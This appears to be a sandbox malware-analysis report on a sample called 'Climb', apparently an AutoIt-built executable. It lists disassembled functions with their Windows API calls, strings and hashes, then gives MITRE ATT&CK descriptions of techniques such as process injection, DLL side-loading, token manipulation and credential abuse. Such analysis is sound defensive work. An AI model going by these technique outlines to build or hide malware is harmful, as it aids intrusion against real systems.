Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: acf6eef9af5e5b50765b280d0f7e5fc2e98a0148307a78fc00f4a0ba95e86fe0
Instruction ID: 08a3c7fe2104b4a167bcbc0669cb2bf21e49f962cdb64de1fced24418cd651ab
Opcode Fuzzy Hash: acf6eef9af5e5b50765b280d0f7e5fc2e98a0148307a78fc00f4a0ba95e86fe0
Instruction Fuzzy Hash: 9F31F974E0160A9FDB14CFA9C980BEEBBB5FF49300F104169EA04AB351DB71A945CF90

Function 00AF3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF3D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF3D23

Strings

Combobox, xrefs: 00AF3CE5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: b9d78fcbba6885fb777007809f750cc5bbcdb3be8119b6e4e16b21ffb5aeee46
Instruction ID: 69559a872ff1f584165e4b137db14727e207c8ce09bcdc5051fdafc3a0a65d11
Opcode Fuzzy Hash: b9d78fcbba6885fb777007809f750cc5bbcdb3be8119b6e4e16b21ffb5aeee46
Instruction Fuzzy Hash: 1011B27270020CAFEF119F94DC81FBF3BAAEB843A4F104524FA1997290D671DD5287A0

Function 00AF41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00A67873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A678B1
Part of subcall function 00A67873: GetStockObject.GDI32(00000011), ref: 00A678C5
Part of subcall function 00A67873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A678CF

GetWindowRect.USER32(00000000,?), ref: 00AF4216
GetSysColor.USER32(00000012), ref: 00AF4230

Strings

static, xrefs: 00AF41F3

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: e656fa653ac762a20521c8cd1d5c247a4aa72997e043a40652e15eac4aa34aae
Instruction ID: 737d03543543148e95535b788103d4573ac002aecf46580b01818b1f75efb4d1
Opcode Fuzzy Hash: e656fa653ac762a20521c8cd1d5c247a4aa72997e043a40652e15eac4aa34aae
Instruction Fuzzy Hash: DE1112B2610209AFDB01DFE8CC46AFE7BB8EB08314F014929FA55E3250E634E851DB60

Function 00ADD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00ADD7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00ADD7EB

Strings

<local>, xrefs: 00ADD7AB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 12f662f1045356fc4a611b7dcbdee6d483c190ccebcd529353ca27fcce13ed5f
Instruction ID: 69bb1df831a1cb7b03b15ceb6bee599df30e79a7ea781c297bdb29d71fa895d9
Opcode Fuzzy Hash: 12f662f1045356fc4a611b7dcbdee6d483c190ccebcd529353ca27fcce13ed5f
Instruction Fuzzy Hash: 92110C71645232BDD7344BA68C49EF7BEADEF127A4F104257F50A93280D6749840D6F0

Function 00AC75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

CharUpperBuffW.USER32(?,?,?), ref: 00AC761D
_wcslen.LIBCMT ref: 00AC7629

Strings

STOP, xrefs: 00AC7623, 00AC7628

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 72a777fc69ef0dd96d24d58a7b73c25d11094f4c1836e3c21ea3dbaab9b66c9f
Instruction ID: 1635a19ee4e2c8bb556b09a6c954a35b64ef1d5cd891512ee83167cef33393c9
Opcode Fuzzy Hash: 72a777fc69ef0dd96d24d58a7b73c25d11094f4c1836e3c21ea3dbaab9b66c9f
Instruction Fuzzy Hash: 10010032A149278BCB20AFBCCC40EBF73B6BF60354B020528E421D6291EB30D800CA50

Function 00AC262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AC2699

Strings

ComboBox, xrefs: 00AC2638
ListBox, xrefs: 00AC2663

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 2dd65b8a3d3b2f833ae5a6a62e2a3bad9e35ddf7e766c2adfe74e86eb63de864
Instruction ID: b5c1de3af9f5ecfa5bcb207efd89f71676b45cb31f03c7b146a2fc6cba6f93f1
Opcode Fuzzy Hash: 2dd65b8a3d3b2f833ae5a6a62e2a3bad9e35ddf7e766c2adfe74e86eb63de864
Instruction Fuzzy Hash: 0A017175A11228ABCB04EBA4CD55EFE77B8EF46350B40061DA872AB3D1EB315809D770

Function 00AC2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00AC2593

Strings

ComboBox, xrefs: 00AC2532
ListBox, xrefs: 00AC255D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: aa2874efd672181e876c1bc96f21208039d7c5d32ab7b89a8b9e857cacc27cc5
Instruction ID: 27b894ce07fd1095f0dbe4b716fb2f47b8116d90b3eb233e14804d421bd62e74
Opcode Fuzzy Hash: aa2874efd672181e876c1bc96f21208039d7c5d32ab7b89a8b9e857cacc27cc5
Instruction Fuzzy Hash: E601A275A50108ABCF05EBA4CA66FFF77B8DF45340F50002DB812B7281EA259E08C7B1

Function 00AC25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00AC2615

Strings

ComboBox, xrefs: 00AC25B6
ListBox, xrefs: 00AC25E1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 76c00773058d2cf34132d62c02f085f314fdc2edcbd011529cb6469b95e6374c
Instruction ID: 0e285e93d3dae8d3f7b20c100b1763a60020e3a3361de62cb26f7fded2d47f66
Opcode Fuzzy Hash: 76c00773058d2cf34132d62c02f085f314fdc2edcbd011529cb6469b95e6374c
Instruction Fuzzy Hash: E101D675A40108ABDB15FBA4DA52FFF77B8DF05340F500029B802E7282DB618E08D7B1

Function 00AC26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AC45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00AC4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00AC2720

Strings

ComboBox, xrefs: 00AC26C2
ListBox, xrefs: 00AC26ED

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: ebc187148592f6cf80a98adf5681374d8c865b7ac569fe70f481fcb8cefc53fa
Instruction ID: 108bdcfbfa64dfc4316373429a3e6657851ca5ab5c65dadf14ea2829eccf0c03
Opcode Fuzzy Hash: ebc187148592f6cf80a98adf5681374d8c865b7ac569fe70f481fcb8cefc53fa
Instruction Fuzzy Hash: E1F0AF75A50228AADB15F7A49D96FFE77B8EF05750F400929B432E72C2EB615808C360

Function 00AC1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AC146F

Strings

AutoIt, xrefs: 00AC1463
Error allocating memory., xrefs: 00AC1468

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 4fd89ad260c1fa09295d894aed1435b6e1ed11d9728de64ef5c73ca1fb9f30cc
Instruction ID: bbf8565b5297f451969639794bdedbcacf966fb9ffe0d9b4a917d434ea4a36da
Opcode Fuzzy Hash: 4fd89ad260c1fa09295d894aed1435b6e1ed11d9728de64ef5c73ca1fb9f30cc
Instruction Fuzzy Hash: 3DE0D83234431836D21537E4BD07F9977858F05B61F11491AF798644C34EE224A04399

Function 00A810B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A7FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A810E2,?,?,?,00A6100A), ref: 00A7FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00A6100A), ref: 00A810E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A6100A), ref: 00A810F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A810F0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: a069f5b28b19b7e7fb47bd7975974354204bec725a8d2955227816226d40d94d
Instruction ID: 15ec1f923ca5ffc47cbe1685c7c400a3e7e537f0baf3745899d5f5c6ca5e3928
Opcode Fuzzy Hash: a069f5b28b19b7e7fb47bd7975974354204bec725a8d2955227816226d40d94d
Instruction Fuzzy Hash: 1EE06D70A003108FD330EF68E908742BFF8AB04300F008A5CE886C2291DBB4D485CB91

Function 00AD39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00AD39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00AD3A05

Strings

aut, xrefs: 00AD39F9

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 897f8cf83e433bb965a66e2ded237ebf8cd9da1377fab05479cde42be647c0e1
Instruction ID: ad39ac1c8eb8952c1458bb43077a6cdc8e34692da63ff1d9e519ef02d5c5a857
Opcode Fuzzy Hash: 897f8cf83e433bb965a66e2ded237ebf8cd9da1377fab05479cde42be647c0e1
Instruction Fuzzy Hash: 5CD05B7154032467DB30D7D49C0DFDB7E6CDB45710F0001917A5591091DAB0D545C7D0

Function 00AF2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF2DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AF2DDB

Part of subcall function 00ACF292: Sleep.KERNEL32 ref: 00ACF30A

Strings

Shell_TrayWnd, xrefs: 00AF2DC1

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0fe9179319a3ee6652855e607c5fa403dc040a5739db65b8b69491b4e10b5b13
Instruction ID: 6cdc74cb17e1617b9b6660b7c5c81f530dcc97d6ee4542db7e16c54520a9f2db
Opcode Fuzzy Hash: 0fe9179319a3ee6652855e607c5fa403dc040a5739db65b8b69491b4e10b5b13
Instruction Fuzzy Hash: E7D012353D5310BBE664F7F0AD0FFE67B559F50B10F1148757349AA1E0C9E46801C654

Function 00AF2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AF2E08
PostMessageW.USER32(00000000), ref: 00AF2E0F

Part of subcall function 00ACF292: Sleep.KERNEL32 ref: 00ACF30A

Strings

Shell_TrayWnd, xrefs: 00AF2E01

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 75fd1612f24ba20f1f1065cfb6b46fe2c63ee1e444ac7df5c5905b6c9c9f4b14
Instruction ID: 63b195f5f4adfcdadc506a17b5ff94d6c96723808ce43114a9099db5b7a4c76b
Opcode Fuzzy Hash: 75fd1612f24ba20f1f1065cfb6b46fe2c63ee1e444ac7df5c5905b6c9c9f4b14
Instruction Fuzzy Hash: 0FD0A9313C13106BE264E3B0AC0BFE26A519B00B10F1008247209AA0E0C8A06801C648

Function 00A9C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00A9C213
GetLastError.KERNEL32 ref: 00A9C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A9C27C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 77ed5111c5ee63751bd19e5851d71e5e93c341d550b130a9db070a97862db9c6
Instruction ID: 90eda623e15a2ab105ec936a9fb1ee5ffb65a01325bc611007f46f0e1f9e7467
Opcode Fuzzy Hash: 77ed5111c5ee63751bd19e5851d71e5e93c341d550b130a9db070a97862db9c6
Instruction Fuzzy Hash: B241B430700A06EFDF21AFE5C944BFA7BE5AF11730F244269E855AB1A1EB308D01C760

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
